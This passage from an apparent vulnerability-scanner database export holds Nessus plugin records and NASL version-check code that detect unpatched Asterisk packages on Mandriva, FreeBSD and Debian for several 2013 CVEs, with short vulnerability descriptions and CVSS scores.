exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-addons-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-devel-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-firmware-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-alsa-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-calendar-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-cel-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-corosync-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-curl-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-dahdi-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-fax-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-festival-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ices-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jabber-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-jack-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ldap-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-lua-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-minivm-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mobile-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mp3-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-mysql-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-ooh323-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-osp-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-oss-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pgsql-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-pktccops-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-portaudio-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-radius-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-saycountpl-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-skinny-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-snmp-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-speex-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-sqlite-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-tds-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-unistim-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-imap-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"asterisk-plugins-voicemail-plain-11.2.2-1.mbs1\")) flag++;\nif (rpm_check(release:\"MDK-MBS1\", cpu:\"x86_64\", reference:\"lib64asteriskssl1-11.2.2-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:10", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A buffer overflow exists in the SIP SDP headers and h264 video handling. NOTE:Only Affects version less than 11.2.2 (CVE-2013-2685)\n\n - A denial of server exists in the HTTP POST requests with very large 'Conten-Length' header values. (CVE-2013-2686)\n\n - An information disclosure exists in the INVITE, SUBSCRIBE and REGISTER transactions and improper settings for the configureatio options. (CVE-2013-2264)", "cvss3": {}, "published": "2013-04-10T00:00:00", "type": "nessus", "title": "Asterisk Multiple Vulnerabilities (AST-2013-001 / AST-2013-002 / AST-2013-003)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*"], "id": "6750.PRM", "href": "https://www.tenable.com/plugins/nnm/6750", "sourceData": "Binary data 6750.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:45:44", "description": "Asterisk project reports :\n\nBuffer Overflow Exploit Through SIP SDP Header\n\nUsername disclosure in SIP channel driver\n\nDenial of Service in HTTP server", "cvss3": {}, "published": "2013-04-08T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (daf0a339-9850-11e2-879e-d43d7e0c7c02)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264", "CVE-2013-2685", "CVE-2013-2686"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_DAF0A339985011E2879ED43D7E0C7C02.NASL", "href": "https://www.tenable.com/plugins/nessus/65852", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(65852);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (daf0a339-9850-11e2-879e-d43d7e0c7c02)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Asterisk project reports :\n\nBuffer Overflow Exploit Through SIP SDP Header\n\nUsername disclosure in SIP channel driver\n\nDenial of Service in HTTP server\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-002.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-003.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/daf0a339-9850-11e2-879e-d43d7e0c7c02.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?75374b7e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/04/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.2.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.12.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.20.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:58:35", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in the SIP processing code of Asterisk - an open source PBX and telephony toolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-03T00:00:00", "type": "nessus", "title": "Debian DSA-2749-1 : asterisk - several vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:asterisk", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2749.NASL", "href": "https://www.tenable.com/plugins/nessus/69542", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2749. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69542);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"DSA\", value:\"2749\");\n\n script_name(english:\"Debian DSA-2749-1 : asterisk - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/asterisk\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2013/dsa-2749\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the asterisk packages.\n\nFor the oldstable distribution (squeeze), these problems have been\nfixed in version 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.8.13.1~dfsg-3+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"asterisk\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-config\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dbg\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-dev\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-doc\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-h323\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"asterisk-sounds-main\", reference:\"1:1.6.2.9-2+squeeze11\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-config\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dahdi\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dbg\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-dev\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-doc\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mobile\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-modules\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mp3\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-mysql\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-ooh323\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-imapstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"asterisk-voicemail-odbcstorage\", reference:\"1.8.13.1~dfsg-3+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:58:40", "description": "Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642).", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:asterisk", "p-cpe:/a:mandriva:linux:asterisk-addons", "p-cpe:/a:mandriva:linux:asterisk-devel", "p-cpe:/a:mandriva:linux:asterisk-firmware", "p-cpe:/a:mandriva:linux:asterisk-gui", "p-cpe:/a:mandriva:linux:asterisk-plugins-alsa", "p-cpe:/a:mandriva:linux:asterisk-plugins-calendar", "p-cpe:/a:mandriva:linux:asterisk-plugins-cel", "p-cpe:/a:mandriva:linux:asterisk-plugins-corosync", "p-cpe:/a:mandriva:linux:asterisk-plugins-curl", "p-cpe:/a:mandriva:linux:asterisk-plugins-dahdi", "p-cpe:/a:mandriva:linux:asterisk-plugins-fax", "p-cpe:/a:mandriva:linux:asterisk-plugins-festival", "p-cpe:/a:mandriva:linux:asterisk-plugins-ices", "p-cpe:/a:mandriva:linux:asterisk-plugins-jabber", "p-cpe:/a:mandriva:linux:asterisk-plugins-jack", "p-cpe:/a:mandriva:linux:asterisk-plugins-ldap", "p-cpe:/a:mandriva:linux:asterisk-plugins-lua", "p-cpe:/a:mandriva:linux:asterisk-plugins-minivm", "p-cpe:/a:mandriva:linux:asterisk-plugins-mobile", "p-cpe:/a:mandriva:linux:asterisk-plugins-mp3", "p-cpe:/a:mandriva:linux:asterisk-plugins-mysql", "p-cpe:/a:mandriva:linux:asterisk-plugins-ooh323", "p-cpe:/a:mandriva:linux:asterisk-plugins-osp", "p-cpe:/a:mandriva:linux:asterisk-plugins-oss", "p-cpe:/a:mandriva:linux:asterisk-plugins-pgsql", "p-cpe:/a:mandriva:linux:asterisk-plugins-pktccops", "p-cpe:/a:mandriva:linux:asterisk-plugins-portaudio", "p-cpe:/a:mandriva:linux:asterisk-plugins-radius", "p-cpe:/a:mandriva:linux:asterisk-plugins-saycountpl", "p-cpe:/a:mandriva:linux:asterisk-plugins-skinny", "p-cpe:/a:mandriva:linux:asterisk-plugins-snmp", "p-cpe:/a:mandriva:linux:asterisk-plugins-speex", "p-cpe:/a:mandriva:linux:asterisk-plugins-sqlite", "p-cpe:/a:mandriva:linux:asterisk-plugins-tds", "p-cpe:/a:mandriva:linux:asterisk-plugins-unistim", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-imap", "p-cpe:/a:mandriva:linux:asterisk-plugins-voicemail-plain", "p-cpe:/a:mandriva:linux:lib64asteriskssl1", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2013-223.NASL", "href": "https://www.tenable.com/plugins/nessus/69540", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:223. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69540);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_bugtraq_id(62021, 62022);\n script_xref(name:\"MDVSA\", value:\"2013:223\");\n\n script_name(english:\"Mandriva Linux Security Advisory : asterisk (MDVSA-2013:223)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated asterisk packages fix security vulnerabilities :\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an ACK with SDP is received after the channel has been\nterminated. The handling code incorrectly assumes that the channel\nwill always be present (CVE-2013-5641).\n\nA remotely exploitable crash vulnerability exists in the SIP channel\ndriver if an invalid SDP is sent in a SIP request that defines media\ndescriptions before connection information. The handling code\nincorrectly attempts to reference the socket address information even\nthough that information has not yet been set (CVE-2013-5642).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-004.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-addons\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-cel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-corosync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:asterisk-plugins-curl\");\n script_set_attribute(attribute:\"cpe\", 